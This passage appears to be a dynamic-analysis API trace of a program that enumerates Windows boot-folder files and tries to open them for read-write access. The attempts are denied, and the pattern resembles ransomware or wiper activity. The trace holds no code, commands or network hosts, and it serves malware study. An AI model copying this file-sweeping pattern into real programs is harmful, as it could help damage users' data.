lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.271] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.271] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.271] CloseHandle (hObject=0x41c) returned 1 [0070.271] AreFileApisANSI () returned 1 [0070.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 30 [0070.272] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.272] GetLastError () returned 0x5 [0070.272] GetLastError () returned 0x5 [0070.272] SetLastError (dwErrCode=0x5) [0070.272] GetLastError () returned 0x5 [0070.272] SetLastError (dwErrCode=0x5) [0070.272] GetLastError () returned 0x5 [0070.272] SetLastError (dwErrCode=0x5) [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.272] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓❠\x01⺊Ā")) returned 0 [0070.272] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0070.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0070.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.273] AreFileApisANSI () returned 1 [0070.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lv-LV", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lv-LV", lpUsedDefaultChar=0x0) returned 14 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.273] AreFileApisANSI () returned 1 [0070.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lv-LV") returned 14 [0070.273] CreateFileW (lpFileName="C:\\Boot\\lv-LV" (normalized: "c:\\boot\\lv-lv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.274] GetLastError () returned 0x5 [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.274] AreFileApisANSI () returned 1 [0070.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lv-LV") returned 14 [0070.274] CreateFileW (lpFileName="C:\\Boot\\lv-LV" (normalized: "c:\\boot\\lv-lv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.274] GetLastError () returned 0x5 [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] GetLastError () returned 0x5 [0070.274] SetLastError (dwErrCode=0x5) [0070.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.275] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.275] FindFirstFileExW (in: lpFileName="C:\\Boot\\lv-LV\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0070.275] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.275] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.276] AreFileApisANSI () returned 1 [0070.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.277] AreFileApisANSI () returned 1 [0070.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 30 [0070.277] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.277] GetFileType (hFile=0x41c) returned 0x1 [0070.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.277] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.277] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.277] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.278] CloseHandle (hObject=0x41c) returned 1 [0070.278] AreFileApisANSI () returned 1 [0070.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 30 [0070.278] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.278] GetLastError () returned 0x5 [0070.278] GetLastError () returned 0x5 [0070.278] SetLastError (dwErrCode=0x5) [0070.278] GetLastError () returned 0x5 [0070.278] SetLastError (dwErrCode=0x5) [0070.278] GetLastError () returned 0x5 [0070.278] SetLastError (dwErrCode=0x5) [0070.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.278] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68b88, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓❘\x01⺊Ā")) returned 0 [0070.278] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0070.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 